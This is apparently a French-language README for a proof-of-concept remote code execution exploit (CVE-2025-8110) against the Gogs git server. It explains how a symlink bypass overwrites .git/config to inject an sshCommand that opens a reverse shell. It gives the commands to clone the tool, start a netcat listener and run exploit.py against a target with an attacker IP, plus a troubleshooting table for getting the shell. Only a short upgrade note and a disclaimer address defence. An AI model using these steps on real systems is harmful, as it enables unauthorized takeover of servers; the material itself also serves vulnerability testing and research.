
Gogs RCE PoC - CVE-2025-8110
Preuve de concept pour CVE-2025-8110 - Exécution de code à distance dans Gogs via un contournement de lien symbolique et une injection de sshCommand.
Cet exploit exploite un contournement de lien symbolique dans l'API Gogs pour écraser .git/config et injecter une sshCommand malveillante qui exécute un shell inversé.
git clone https://github.com/X4BROZER/CVE-2025-8110.git
cd CVE-2025-8110
pip install -r requirements.txt
Connectez-vous à Gogs → Paramètres → Applications → Générer un jeton
nc -lvnp 4444
python3 exploit.py -u http://target:3000 -U <USERNAME GOGS> -P <PASSWORD GOGS> -t <TOKEN> -lh <ATTACKER IP> -lp <ATTACKER PORT>
python3 exploit.py -u http://localhost:3001 -U amine -P amine -t 44f4e64a1e6353f247050055aa0d3cc13b577ac3 -lh 10.10.17.134 -lp 4444
| Problème | Solution |
|---|---|
| Échec de connexion | Vérifiez le nom d'utilisateur/mot de passe |
| Échec de création du dépôt | Régénérez le jeton API |
| Délai de lecture dépassé | Normal - vérifiez l'écouteur |
| Pas de shell | Vérifiez le pare-feu, essayez un autre port |
Mettez à jour vers Gogs v0.13.4 ou ultérieur :
wget https://dl.gogs.io/v0.13.4/gogs_v0.13.4_linux_amd64.tar.gz
tar -xzf gogs_v0.13.4_linux_amd64.tar.gz
Cet outil est destiné à des fins éducatives et de tests autorisés uniquement. Tout accès non autorisé est illégal.
| Argument | Description |
|---|
| -u, --url | URL cible Gogs (ex : http://target:3000) |
| -U, --username | Nom d'utilisateur Gogs |
| -P, --password | Mot de passe Gogs |
| -t, --token | Jeton API Gogs |
| -lh, --host | Votre IP pour le shell inversé |
| -lp, --port | Votre port pour l'écouteur |
| -x, --proxy | Activer le proxy (localhost:8080) |